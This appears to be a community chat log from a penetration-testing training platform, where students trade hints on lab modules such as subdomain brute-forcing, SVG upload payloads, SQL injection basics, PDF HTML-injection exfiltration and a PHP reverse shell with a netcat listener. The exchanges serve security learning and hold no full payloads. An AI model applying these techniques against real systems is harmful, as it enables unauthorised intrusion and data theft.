Hi, I am working on the limited file uploads module. When i upload a svg file nothing is rendered in the page including the upload button, i then tried creating the svg with an online converter and that just echo'd the payload within the image.

Any help would be appreciated.

yeah this is one of those over thinking moments lol. which is insane because all signs point the opposite

Hello, I have found also subdomains of subdomains but none of them ends with 'x.x.x.203'

then you're looking in the wrong place

it's gonna be a subdomain you can't just axfr to

do your initial subdomain enumeration of the base domain [inlanefreight.htb] and compile your list of subdomains to check from that

this is why the bruteforce tool is showcased

Remember the question where you were asked how many zones there were? You have to enumerate those zones for subdomains

The .203 isn't in either of those zones

Oh that's from like 40 mins ago lol

I could've sworn it was in the second zone but it's been awhile

It's in a zone you can't normally access

Which is why bruteforce

Ah, right. I remember having a lot of issues with that particular lab

any ideas why proxychains curl http://172.16.5.135:80 works but proxychains firefox cant reach the webserver?

¯_(ツ)_/¯

Try proxychains firefox website

i did, i cant reach the http://172.16.5.135:80

Also you don't need to specify port 80

It's likely you might have skipped a step

Also try commenting out the other conf line

randomly worked now.. Weird

Hello, thanks for the answer but I tried now several SecLists to brute force but to no avail...and note these are very large files, it takes time to brute force and the connection over VPN / in-browser is sometime very unstable.

Listen carefully: you're meant to bruteforce a subdomain.

The list given in the example works

If you use that tool in your initial enumeration, you WILL miss the subdomain that leads you to the answer

Ah I see...now the problem comes up that the SecLists contains now just single words but xxx.yyy . So bruteforcing tries it with . (dots) which might lead you to think it tries subdomains as well. Thanks for the 'subdomain' pointer I will try it again later this week

No. The list should generally contain single words, you can specify a subdomain in the tool

I.e. subdomain.inlanefreight.htb

The tool then checks [list].subdomain.inlanefreight.htb

I am going to be so happy when I am done with the AD Enum & Attacks module...

It's tedious for sure

The foothold PC on the Shells & Payloads live engagement is so painfully slow

Are you actually using the right tool to brute force the subdomains?

Because if you’re not using the tool, you will not find the subdomain

Am I wrong in thinking that the way to get into the ||mysql account is via .ssh||

I am on the module Attack Common Applications, and I'm stuck on the Thick Client Applications in regards to Restart-Oracle.exe. No matter what I try and execute, or delete from the bat file in tmp, I don't end up with a restart-service.exe.. even if I run the monta.ps1 manually

It’s probs one o the most important modules tho right?

No idea. Someone who has the cert would know.

I meant in general as almost everything is AD

Seems the web is pretty popular.

hey

The exam is a mostly ad environment

I think he was asking in general terms.

I mean ya and no

There's no real AV/EDR on the exam, but you're not really taught much evasion techniques

I know the exam is mostly aD as the overview says it

But corp environs are mostly ad now

Why did you ask me then?

I don't know what is going on...

Because it’s an important topic that everyone should not rush thru and get bored of

¯_(ツ)_/¯

who gets bored of AD

The ad enum module is just a fair bit of tedium

Frankly, I feel like ADP testing would be really fun.

i can't imagine anyone getting bored of AD

it's so big, so many attack vectors

Devs devs get bored of AD

Not really boring, just if you have a wide net: it's gonna take ages

Exactly

Oops wrong @

Lol. I don't think you should chastise me because I said "I will be happy when I am done"

I.e. running a broad query can take like 30 minutes

I didn't read it as you disliking it either, just glad to be done a large module

In truth. I am learning a lot.

Its like 20 sections

So it's a lot.

That is part of why the chapter is so heavy and is taking me a while.

I have a question about the intercepting web requests module. When I use foxyproxy along with burp suite everything works fine and I can intercept requests. When I use zap with foxyproxy I get a login to network page. How do I fix this so I can use zap

oops I think this is the wrong section my bad

This is the right channel

Ok wasnt sure if I had to post to community help

this is the right place for help with academy modules; if someone that's completed it comes by they're more likely to help here than in the community help forum

that forum is more for general help than module help

ok cool

i got it working

is there a known connection problem on the getting started knowledge check lab?

Hello! I'm in SQL Injection Fundamentals > SQL Operators and the question is 'In the 'titles' table,*** what is the number of records*** WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?'

So *according * with the section, it needs something extra to learn beyond of the section because using what the section has shown it is not completely possible to know "the number of records", but you can see the records according with the section

I already have the answer to the question but I think could've been better that on the section would have shown that*** extra ***thing which is not shown.

SQL has a nice little feature of being able to count; but also it's asking specifically the employee number

aka their ID #

Anyone completed the HTML injection in PDF module? I'm not sure how to complete the objective "access an internal web application and exfiltrate the flag. " since I can't receive a callback at interactsh or the tun0 adapter of the pwnbox ;\

like if you're the 10000 employee your ID would be #<insert leading 0s>10000

Sure, but I mean at the level of output (number) which is different of the number of ID of the employee so... it's necessary that little feature that is not shown in the section 😅 but it would be very nice if one could learn that on the fly in the section and then think how we can do a better query

well SQL injections is assuming fundamental knowledge of SQL queries

¯_(ツ)_/¯

so on the getting started knowledge module I have a nc listener running and php reverse shell file saved into the theme edit page. When I go to click the link for the theme folder location which is http://gettingstarted.htb/theme/Innovation/template.php I get a server not found error

something like select name from titles where employee_number > 10000 OR job != "Engineer" if i'm remembering my negative sql queries right

then all you have to do is maybe use the built-in count feature to actually count

i forgor how to set up a count query

oh wait it might just be count(name)

for specifically that variable

Exactly! well, is with COUNT(something) AS and so on

technically you can just leave out the as

you'd only really include AS to have another variable

But that query is the first thing that comes to mind of one

And yeah, that's exactly what would be nice to learn in the section besides of && || and the other things, like a kind of great explanation to use COUNT like they did with the others features like WHERE, AND, etc

this is the SQL injection fundamentals module?

Yes!

ok; because there's like 2-3 different SQL inject modules

so yeah I agree it should be included/talked about

but it doesn't hurt to have to do a bit of self-research

Can anyone help me out with the Secure Coding 101: Skills Assessment for the Patch section? Im just at a loss at what I am supposed to sanitize. I have tried to sanitize a bunch of different stuff but nothing's worked yet

I'm running the knowledge check through openvpn should I just try start an instane since I can't connect to the server this way? I've tried re running this several times now

the vpn should be fine; as long as you get the initialization complete message in your terminal in the vm it should be fine

Hola amigos!

i'm new!

i need help